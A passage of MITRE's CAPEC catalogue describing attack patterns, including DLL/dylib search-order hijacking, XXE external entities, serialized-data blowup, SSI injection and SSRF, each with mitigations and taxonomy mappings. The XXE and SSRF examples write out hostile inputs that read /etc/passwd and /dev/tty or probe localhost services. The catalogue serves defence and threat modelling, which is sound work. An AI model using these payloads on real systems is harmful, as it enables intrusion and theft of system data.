ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	159	Redirect Access to Libraries

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Identify target general susceptibility: An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.

Techniques
The attacker uses a tool such as the OSX "otool" utility or manually probes whether the target application uses dynamically linked libraries.
The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted.

Experiment

Craft malicious libraries: The attacker uses knowledge gained in the Explore phase to craft malicious libraries that they will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.

Techniques
The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using "sleep(2)" and "usleep()" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.

Exploit

Redirect the access to libraries to the malicious libraries: The attacker redirects the target to the malicious libraries they crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.

Techniques
The attacker modifies the entries in the configuration files pointing to the malicious libraries they crafted.
The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-132.
The attacker leverages file search path order issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-38.

Prerequisites

Attacker has a mechanism to place its malicious libraries in the needed location on the file system.

Skills Required

[Level: Medium]

Ability to create a malicious library.

Mitigations

Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected

Design: Sign system DLLs so that unauthorized DLLs can be detected.

Example Instances

For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute.

macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level.

Related Weaknesses

CWE-ID	Weakness Name
427	Uncontrolled Search Path Element

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1574.001	Hijack Execution Flow:DLL search order hijacking
1574.004	Hijack Execution Flow: Dylib Hijacking
1574.008	Hijack Execution Flow: Path Interception by Search Order Hijacking

References

[REF-409] "M Trends Report". Mandiant. 2011. <https://www.mandiant.com>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Examples-Instances, References, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	DLL Search Order Hijacking

CAPEC-581: Security Software Footprinting

Attack Pattern ID: 581

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	580	System Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Mitigations

Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.

Related Weaknesses

General: This attack pattern does not depend upon an underlying system, application, or component weakness and, therefore, cannot be mapped to the Common Weakness Enumeration (CWE) body of knowledge.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1518.001	Software Discovery:Security Software Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Taxonomy_Mappings

CAPEC-201: Serialized Data External Linking

Attack Pattern ID: 201

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	122	Privilege Abuse
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	278	Web Services Protocol Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality, Subvert Access Control

Execution Flow

Explore

Survey the target: Using a browser or an automated tool, an adversary records all instances of web services that process requests with serialized data.

Techniques
Use an automated tool to record all instances of URLs that process requests with serialized data.
Use a browser to manually explore the website and analyze how the application processes serialized data requests.

Exploit

Craft malicious payload: The adversary crafts malicious data message that contains references to sensitive files.
Launch an External Linking attack: Send the malicious crafted message containing the reference to a sensitive file to the target URL.

Prerequisites

The target must follow external data references without validating the validity of the reference target.

Skills Required

[Level: Low]

To send serialized data messages with maliciously crafted schema.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Configure the serialized data processor to only retrieve external entities from trusted sources.

Example Instances

The following DTD would attempt to open the /dev/tty device:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///dev/tty"> ]>

A malicious actor could use this crafted DTD to reveal sensitive information.

The following XML snippet would attempt to open the /etc/passwd file:

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-73] "XXE (Xml eXternal Entity) Attack". Beyond Security. <http://www.securiteam.com/securitynews/6D0100A5PU.html>.

[REF-74] "CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection". <http://scary.beasts.org/security/CESA-2007-002.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Activation_Zone, Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Examples-Instances, Injection_Vector, Methods_of_Attack, Payload, Payload_Activation_Impact, Resources_Required, Typical_Likelihood_of_Exploit, Typical_Severity
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Description Summary, Related_Attack_Patterns, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Description, Execution_Flow, Mitigations, Skills_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Consequences, Description
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Example_Instances, Execution_Flow, Prerequisites
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	XML Entity Blowup

2020-07-30 (Version 3.3)	XML Entity Linking

CAPEC-229: Serialized Data Parameter Blowup

Attack Pattern ID: 229

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	231	Oversized Serialized Data Payloads

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process requests using serialized data.

Techniques
Use an automated tool to record all instances of URLs to process requests from serialized data.
Use a browser to manually explore the website and analyze how the application processes requests using serialized data.

Exploit

Launch a Blowup attack: The attacker crafts malicious messages that contain multiple configuration parameters in the same dataset.
Techniques
Send the malicious crafted message containing the multiple configuration parameters to the target URL, causing a denial of service.

Prerequisites

The server accepts input in the form of serialized data and is using a parser with a runtime longer than O(n) for the insertion of a new configuration parameter in the data container.(examples are .NET framework 1.0 and 1.1)

Mitigations

This attack may be mitigated completely by using a parser that is not using a vulnerable container.

Mitigation may limit the number of configuration parameters per dataset.

Example Instances

In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).

<?xml version="1.0"?>
<foo
aaa=""
ZZZ=""
...
999=""
/>

A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.

A YAML bomb leverages references within a YAML file to create exponential growth in memory requirements. By creating a chain of keys whose values are a list of multiple references to the next key in the chain, the amount of memory and processing required to handle the data grows exponentially. This may lead to denial of service or instability resulting from excessive resource consumption.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
41	XML Attribute Blowup

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Activation_Zone, Attack_Phases, Description, Description Summary, Examples-Instances, Injection_Vector, Methods_of_Attack, Payload, Related_Attack_Patterns, Typical_Likelihood_of_Exploit, Typical_Severity
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2020-07-30 (Version 3.3)	XML Attribute Blowup

CAPEC-230: Serialized Data with Nested Payloads

Attack Pattern ID: 230

Abstraction: Standard

View customized information:

Description

Extended Description

An adversary's goal is to leverage parser failure to their advantage. In most cases this type of an attack will result in a Denial of Service due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].

This attack is most closely associated with web services using SOAP or a Rest API, because remote service requesters can post malicious payloads to the service provider. The main weakness is that the service provider generally must inspect, parse, and validate the messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that this attack targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.

Alternate Terms

Term: XML Denial of Service (XML DoS)

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	197	Exponential Data Expansion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	491	Quadratic Data Expansion

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

An adversary determines the input data stream that is being processed by a data parser that supports using substitution on the victim's side.

Exploit

An adversary crafts input data that may have an adverse effect on the operation of the parser when the data is parsed on the victim's system.

Prerequisites

An application's user-controllable data is expressed in a language that supports subsitution.

An application does not perform sufficient validation to ensure that user-controllable data is not malicious.

Indicators

Bad data is passed to the data parser (possibly repeatedly), possibly making it crash or execute arbitrary code.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Carefully validate and sanitize all user-controllable data prior to passing it to the data parser routine. Ensure that the resultant data is safe to pass to the data parser.

Perform validation on canonical data.

Pick a robust implementation of the data parser.

Related Weaknesses

CWE-ID	Weakness Name
112	Missing XML Validation
20	Improper Input Validation
674	Uncontrolled Recursion
770	Allocation of Resources Without Limits or Throttling

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Alternate_Terms, Description, Execution_Flow, Indicators, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Name, Description, Execution_Flow, Extended_Description, Indicators, Mitigations, Prerequisites, Skills_Required
Previous Entry Names
Change Date	Previous Entry Name
2021-10-21 (Version 3.6)	XML Nested Payloads

CAPEC-677: Server Motherboard Compromise

Attack Pattern ID: 677

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	534	Malicious Hardware Update

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Prerequisites

An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance.

Consequences

Scope	Impact	Likelihood
Integrity	Execute Unauthorized Commands

Mitigations

Purchase IT systems, components and parts from government approved vendors whenever possible.

Establish diversity among suppliers.

Conduct rigorous threat assessments of suppliers.

Require that Bills of Material (BoM) for critical parts and components be certified.

Utilize contract language requiring contractors and subcontractors to flow down to subcontractors and suppliers SCRM and SCRA (Supply Chain Risk Assessment) requirements.

Establish trusted supplier networks.

Example Instances

Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

[REF-685] "Kaspersky Finds Sophisticated UEFI Malware in the Wild". ExtremeTech. 2020-10-05. <https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild>. URL validated: 2021-10-19.

Content History

Submissions
Submission Date	Submitter	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated @Name
Previous Entry Names
Change Date	Previous Entry Name
2023-01-24 (Version 3.9)	Server Functionality Compromise

CAPEC-101: Server Side Include (SSI) Injection

Attack Pattern ID: 101

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	253	Remote Code Inclusion
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Determine applicability: The adversary determines whether server side includes are enabled on the target web server.

Techniques

Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled.

Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it.

Experiment

Find Injection Point: Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server.

Techniques
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.

Exploit

Inject SSI: Using the found injection point, the adversary sends arbitrary code to be inlcuded by the application on the server side. They may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the adversary.

Prerequisites

A web server that supports server side includes and has them enabled

User controllable input that can carry include directives to the web server

Skills Required

[Level: Medium]

The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed.

Resources Required

None: No specialized resources are required to execute this type of attack. Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. Spidering tools can make the task of finding and following links easier.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them

All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive

Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead

Example Instances

Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the "Options Includes" directive enabled.

Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error.

When these logs are eventually reviewed, the server parses the SSI directives and executes them.

Related Weaknesses

CWE-ID	Weakness Name
97	Improper Neutralization of Server-Side Includes (SSI) Within a Web Page
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
36	SSI Injection

Relevant to the OWASP taxonomy mapping

Entry Name
Server-Side Includes (SSI) Injection

References

[REF-610] "OWASP Web Security Testing Guide". Testing for SSI Injection. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns, Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-664: Server Side Request Forgery

Attack Pattern ID: 664

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	122	Privilege Abuse
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	126	Path Traversal
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	161	Infrastructure Manipulation
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	253	Remote Code Inclusion
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	309	Network Topology Mapping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Find target application: Find target web application that accepts a user input and retrieves data from the server

Experiment

Examine existing application requests: Examine HTTP/GET requests to view the URL query format. Adversaries test to see if this type of attack is possible through weaknesses in an application's protection to Server Side Request Forgery

Techniques
Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.
Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.
Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output.

Exploit

Malicious request: Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services and sends the request to the application

Prerequisites

Server must be running a web application that processes HTTP requests.

Skills Required

[Level: Medium]

The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response.

[Level: High]

The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.

Resources Required

[None] No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity Confidentiality Availability	Modify Data
Confidentiality	Read Data
Availability	Resource Consumption

Mitigations

Handling incoming requests securely is the first line of action to mitigate this vulnerability. This can be done through URL validation.

Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.

Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.

Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.

Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. can be prevented.

Example Instances

An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:

POST /product/category HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 200

vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory

A malicious user can modify the request URL to look like this instead:

POST /product/category HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 200

vulnerableService=http://localhost/server-status

vulnerableService = file:///etc/passwd

vulnerableService=dict://localhost:12345/info

If the exploit is successful, the server may return the data requested by the adversary

root:!:0:0::/:/usr/bin/ksh

daemon:!:1:1::/etc:

bin:!:2:2::/bin:

sys:!:3:3::/usr/sys:

adm:!:4:4::/var/adm:

uucp:!:5:5::/usr/lib/uucp:

guest:!:100:100::/home/guest:

nobody:!:4294967294:4294967294::/:

lpd:!:9:4294967294::/:

lp:*:11:11::/var/spool/lp:/bin/false

invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh

nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico

paul:!:201:1::/home/paul:/usr/bin/ksh

jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh

The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. [REF-646]

Related Weaknesses

CWE-ID	Weakness Name
918	Server-Side Request Forgery (SSRF)
20	Improper Input Validation

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

